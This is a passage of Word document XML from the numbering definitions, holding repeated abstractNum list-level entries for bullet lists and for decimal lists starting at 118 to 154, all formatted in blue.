      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21415">
    <w:lvl>
      <w:start w:val="118"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21416">
    <w:lvl>
      <w:start w:val="119"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21417">
    <w:lvl>
      <w:start w:val="120"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21418">
    <w:lvl>
      <w:start w:val="121"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21419">
    <w:lvl>
      <w:start w:val="122"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21420">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21421">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21422">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21423">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21424">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21425">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21426">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21427">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21428">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21429">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21430">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21431">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21432">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21433">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21434">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21435">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21436">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21437">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21438">
    <w:lvl>
      <w:start w:val="123"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21439">
    <w:lvl>
      <w:start w:val="124"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21440">
    <w:lvl>
      <w:start w:val="125"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21441">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21442">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21443">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21444">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21445">
    <w:lvl>
      <w:start w:val="126"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21446">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21447">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21448">
    <w:lvl>
      <w:start w:val="127"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21449">
    <w:lvl>
      <w:start w:val="128"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21450">
    <w:lvl>
      <w:start w:val="129"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21451">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21452">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21453">
    <w:lvl>
      <w:start w:val="130"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21454">
    <w:lvl>
      <w:start w:val="131"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21455">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21456">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21457">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21458">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21459">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21460">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21461">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21462">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21463">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21464">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21465">
    <w:lvl>
      <w:start w:val="132"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21466">
    <w:lvl>
      <w:start w:val="133"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21467">
    <w:lvl>
      <w:start w:val="134"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21468">
    <w:lvl>
      <w:start w:val="135"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21469">
    <w:lvl>
      <w:start w:val="136"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21470">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21471">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21472">
    <w:lvl>
      <w:start w:val="137"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21473">
    <w:lvl>
      <w:start w:val="138"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21474">
    <w:lvl>
      <w:start w:val="139"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21475">
    <w:lvl>
      <w:start w:val="140"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21476">
    <w:lvl>
      <w:start w:val="141"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21477">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21478">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21479">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21480">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21481">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21482">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21483">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21484">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21485">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21486">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21487">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21488">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21489">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21490">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21491">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21492">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21493">
    <w:lvl>
      <w:start w:val="142"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21494">
    <w:lvl>
      <w:start w:val="143"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21495">
    <w:lvl>
      <w:start w:val="144"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21496">
    <w:lvl>
      <w:start w:val="145"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21497">
    <w:lvl>
      <w:start w:val="146"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21498">
    <w:lvl>
      <w:start w:val="147"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21499">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21500">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21501">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21502">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21503">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21504">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21505">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21506">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21507">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21508">
    <w:lvl>
      <w:start w:val="148"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21509">
    <w:lvl>
      <w:start w:val="149"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21510">
    <w:lvl>
      <w:start w:val="150"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21511">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21512">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21513">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21514">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21515">
    <w:lvl>
      <w:start w:val="151"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21516">
    <w:lvl>
      <w:start w:val="152"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21517">
    <w:lvl>
      <w:start w:val="153"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21518">
    <w:lvl>
      <w:start w:val="154"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
